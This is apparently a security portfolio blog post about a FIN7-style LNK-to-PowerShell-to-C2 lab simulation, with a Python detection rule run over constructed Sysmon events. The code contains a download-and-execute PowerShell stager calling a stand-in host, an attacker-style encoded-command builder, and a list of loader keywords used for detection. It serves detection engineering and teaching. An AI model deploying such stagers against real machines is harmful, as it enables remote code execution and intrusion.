POC #2: Endpoint Threat Detection Simulation
- TrilloSec
- Jul 17
- 1 min read
Updated: Jul 18

This simulation showcases how I uncover endpoint blind spots and translate advanced threat techniques into clear, actionable findings for security and sales teams alike. I engineered a phishing-to-C2 campaign inspired by FIN7 to assess detection gaps and communicate risk across Red, Blue, and Purple team functions.
✔ Red Team (Attack Simulation): Built a multi-stage phishing campaign using LNK payloads, PowerShell loaders, and Meterpreter C2 to emulate initial access and persistence (MITRE T1566.001, T1204, T1218).
✔ Blue Team (Detection Engineering): Tuned Sysmon and Splunk rules so the chain went from undetected to a 1-minute time-to-alert and a 5-minute containment window.
✔ Purple Team (Business Alignment): Quantified a $58K-per-incident risk reduction and mapped findings to NIST 800-53, ISO 27001, PCI-DSS, and GDPR.
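To make the Blue Team side concrete, here is a detection for the LNK → PowerShell → C2 chain run over constructed Sysmon-style events. This is an added example, not code or rules from the TrilloSec reports: the field names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect), but the indicators (explorer.exe parent, hidden window, encoded command, download-and-execute markers in the decoded payload), the 60-second beacon window and the score threshold are assumptions, and the sample events use made-up GUIDs and TEST-NET addresses.

```python
"""
Detection logic for a LNK -> PowerShell -> C2 chain over constructed Sysmon-style
events. Added example, not code from TrilloSec's reports; field names follow
Sysmon Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect), and the
indicators, window and threshold below are assumptions.
"""
import base64
import re
from datetime import datetime, timedelta

# Assumption: the loader launched by the LNK uses a hidden window and an encoded command.
HIDDEN_FLAG = re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"(?<!\S)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
LOADER_MARKERS = ("DownloadString", "Invoke-Expression", "IEX", "FromBase64String", "Net.WebClient")
SYSMON_TIME = "%Y-%m-%d %H:%M:%S.%f"

def encode_command(script):
    """Build a -EncodedCommand argument the way an attacker does: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_process_create(ev):
    """Score a ProcessCreate record; returns (score, reasons). A score of 0 means benign."""
    reasons = []
    if not ev["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, reasons
    if ev["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("PowerShell spawned by explorer.exe (T1204 user execution, LNK double-click)")
    if HIDDEN_FLAG.search(ev["CommandLine"]):
        reasons.append("hidden window flag")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command")
        hits = [m for m in LOADER_MARKERS if m.lower() in decoded.lower()]
        if hits:
            reasons.append("decoded payload calls " + ", ".join(hits))
    return len(reasons), reasons

def _ts(ev):
    return datetime.strptime(ev["UtcTime"], SYSMON_TIME)

def correlate(events, window_seconds=60, min_score=2):
    """High alert when a suspicious ProcessCreate is followed within window_seconds by a
    NetworkConnect from the same ProcessGuid (the beacon); medium if no connection follows."""
    suspicious, escalated, alerts = {}, set(), []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev["EventID"] == 1:
            score, reasons = score_process_create(ev)
            if score >= min_score:
                suspicious[ev["ProcessGuid"]] = (ev, reasons)
        elif ev["EventID"] == 3 and ev["ProcessGuid"] in suspicious:
            create, reasons = suspicious[ev["ProcessGuid"]]
            delta = _ts(ev) - _ts(create)
            if timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                escalated.add(ev["ProcessGuid"])
                alerts.append({"severity": "high", "host": ev["Computer"], "pid": create["ProcessId"],
                               "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}',
                               "seconds_to_beacon": delta.total_seconds(),
                               "reasons": reasons + ["outbound connection from the loader (C2 beacon)"]})
    for guid, (create, reasons) in suspicious.items():
        if guid not in escalated:
            alerts.append({"severity": "medium", "host": create["Computer"], "pid": create["ProcessId"],
                           "dest": None, "seconds_to_beacon": None, "reasons": reasons})
    return alerts

# Constructed stager one-liner; the host is a TEST-NET address, not a real C2.
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')"

def sample_events():
    """Constructed Sysmon-style records (made-up GUIDs and PIDs), not real telemetry."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return [
        {"EventID": 1, "Computer": "WS01", "UtcTime": "2025-07-17 14:02:05.101", "ProcessGuid": "{A1}",
         "ProcessId": 4120, "Image": ps, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
         "CommandLine": "powershell.exe -Command Get-Process"},  # admin at a console: benign
        {"EventID": 1, "Computer": "WS01", "UtcTime": "2025-07-17 14:02:11.523", "ProcessGuid": "{B2}",
         "ProcessId": 5208, "Image": ps, "ParentImage": "C:\\Windows\\explorer.exe",
         "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGE_SCRIPT)},
        {"EventID": 3, "Computer": "WS01", "UtcTime": "2025-07-17 14:02:13.044", "ProcessGuid": "{B2}",
         "ProcessId": 5208, "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    ]

if __name__ == "__main__":
    for a in correlate(sample_events()):
        print(a["severity"].upper(), a["host"], a["pid"], a["dest"], "|", "; ".join(a["reasons"]))
```

The admin's console PowerShell scores 0 and never reaches the correlator, while the explorer.exe-launched hidden, encoded loader followed 1.5 seconds later by its outbound connection becomes a single high-severity alert with the decoded stager in the reasons. The same two-event join is what a Splunk search over Sysmon data would express with a transaction or stats by ProcessGuid; the point of decoding the payload in the rule rather than only flagging `-enc` is that it turns a noisy indicator into an actionable one.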
Sales Engineering Impact
This lab helps me guide SMB prospects through real-world endpoint threats and clearly show how behavioral detections reduce dwell time, strengthen compliance, and deliver peace of mind.
Read the Reports
🔴 Red Team Report (LNK → PowerShell → C2)
🔵 Blue Team Report (Sysmon, Splunk, LimaCharlie)
🟣 Purple Team Report (Business Risk & Compliance Mapping)
⚙️ Setup Guide (Home Lab Environment)